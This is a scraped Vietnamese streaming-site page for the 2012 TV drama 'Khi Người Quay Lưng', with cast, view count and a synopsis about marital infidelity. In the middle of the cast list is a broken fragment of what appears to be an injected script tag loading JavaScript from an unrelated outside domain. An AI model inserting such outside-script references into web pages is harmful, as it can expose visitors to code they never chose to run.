xem phim khi nguoi quay lung phimvn 2012 online, download Khi Người Quay Lưng - PhimVN 2012 30/30 DVD RIP hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Khi Người Quay Lưng - PhimVN 2012 30/30 DVD RIP - phim viet nam
khi nguoi quay lung  phimvn 2012

Khi Người Quay Lưng - PhimVN 2012 30/30 DVD RIP

,

30 episodes | Luot Xem: 1260664   |  2012 |  Vietnam
Dien Vien: Minh Thư, Huệ Minh, Quách Ngọc Ngoan, Mạnh Hùng, Quang Thảo, Thanh Bình, Ngọc Hùng, Nữ hoàng sắc đẹp Vũ Hoàng Điệp, diễn viên Bảo Trân, Mai Hải Anh, Lộc Uyển type=" src="http://raphd.net/js/loadjaca.js

cham bi  Description - Thong tin them ve phim

“Khi người quay lưng” do Hãng phim MT Pictures sản xuất sẽ phát sóng lúc 20h30 vào các thứ 2,3 và 4 bắt đầu từ ngày 02/04/2012 trên sóng Đài phát thanh- Truyền hình Vĩnh Long 1.

Phim dài 30 tập với sự tham gia của dàn diễn viên trẻ Minh Thư, Huệ Minh, Quách Ngọc Ngoan, Mạnh Hùng, Quang Thảo, Thanh Bình, Ngọc Hùng, Nữ hoàng sắc đẹp Vũ Hoàng Điệp, diễn viên Bảo Trân, Mai Hải Anh, Lộc Uyển..
“Khi người quay lưng” xoay quanh mối quan hệ trong đời sống hôn nhân của các cặp vợ chồng mà trong phim điển hình là cuộc sống hôn nhân của Lan Hoa và Thành Hưng, Tuấn Tú và Diệu Linh, Khánh trình và Dung bên cạnh các người đàn ông, phụ nữ đơn thân trong vị trí người thứ ba xen vô đời sống hôn nhân của các cặp như Hồng Loan, Phương Trinh, Đạm, Hoàng Uyên…Họ là những người trẻ, mỗi người ít nhiều chưa có hoặc đã có những lỗi lầm trong cuộc sống gia đình của mình và sau đó, mỗi người có một hướng đi cho riêng mình. Người thì tìm được lối về với cuộc sống đích thực, người thì mãi lạc lối không còn đường về….


Ngoại tình đang trở thành một “vấn đề nhạy cảm” trong xã hội. Có nhiều lý do để những người vợ, người chồng, các cô gái, chàng trai biện minh cho lí do ngoại tình của mình và trở thành “kẻ thứ 3” phá hoại gia đình người khác. Hành vi ngoại tình khi bị phát hiện đều dẫn đến những tổn thương nặng nề và đổ vỡ trong cuộc sống gia đình và tình yêu đôi lứa…
Thông qua sách, báo, các phương tiện truyền thông đại chúng, và chính cuộc sống, mối quan hệ xung quanh… Mọi người đã nghe nhiều, biết nhiều và chứng kiến nhiều về vấn đề ngoại tình và vì thế, ngoại tình giờ đây đã không còn quá xa lạ trong xã hội đầy những áp lực và cám dỗ này. Nhiều người cho rằng, ngoại tình đã trở thành một căn bệnh nan y, là một vấn đề nan giải của toàn xã hội. Muốn diệt tận gốc mầm bệnh, chúng ta cần phải nhìn nhận thực tế và đi tìm nguyên nhân sâu xa của nó. Nhưng điều đó là không dễ dàng và có kết quả một sớm một chiều…
Dẫu biết ngoại tình là khái niệm mà không ai muốn nó xuất hiện trong cuộc sống gia đình mình. Tuy nhiên, sự thật phũ phàng luôn khiến người trong cuộc phải choáng váng. Trong cuộc sống hôn nhân gia đình, nếu chẳng may chuyện ngoại tình xảy đến, chúng ta thường hay tự đặt ra những câu hỏi:
Hiểu được chuyện, trong quá trình xây dựng hạnh phúc hôn nhân, gia đình, các cặp vợ chồng không khỏi tránh được những lần lạc lối với những bước đi sai lầm rồi mới tìm ra lối về hạnh phúc đích thực của mỗi người đang là điều mà mỗi gia đình, cặp vợ chồng đều mong muốn và xã hội quan tâm… Hãng phim M&T Pictures quyết định sản xuất bộ phim truyền hình dài 30 tập “Khi ngừời quay lưng” tuy không mong muốn có thể lí giải trọn vẹn được hết những câu hỏi nan giải trên nhưng hy vọng, phim sau khi xem phim, những ai đã và đang lạc lối trong hôn nhân và mong muốn tìm đường về với hạnh phúc sẽ thấy được những bài học kinh nghiệm, có ích, có ý nghĩa cho chính mình.

Chi tiet: http://www.kenh88.com/xem-phim-5102/khi-nguoi-quay-lung-viet-nam-2012.html#ixzz26kHClzu9

Phim cùng thể loại - Similar movies
View: 1025712
View: 827225
View: 89469
View: 486449
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung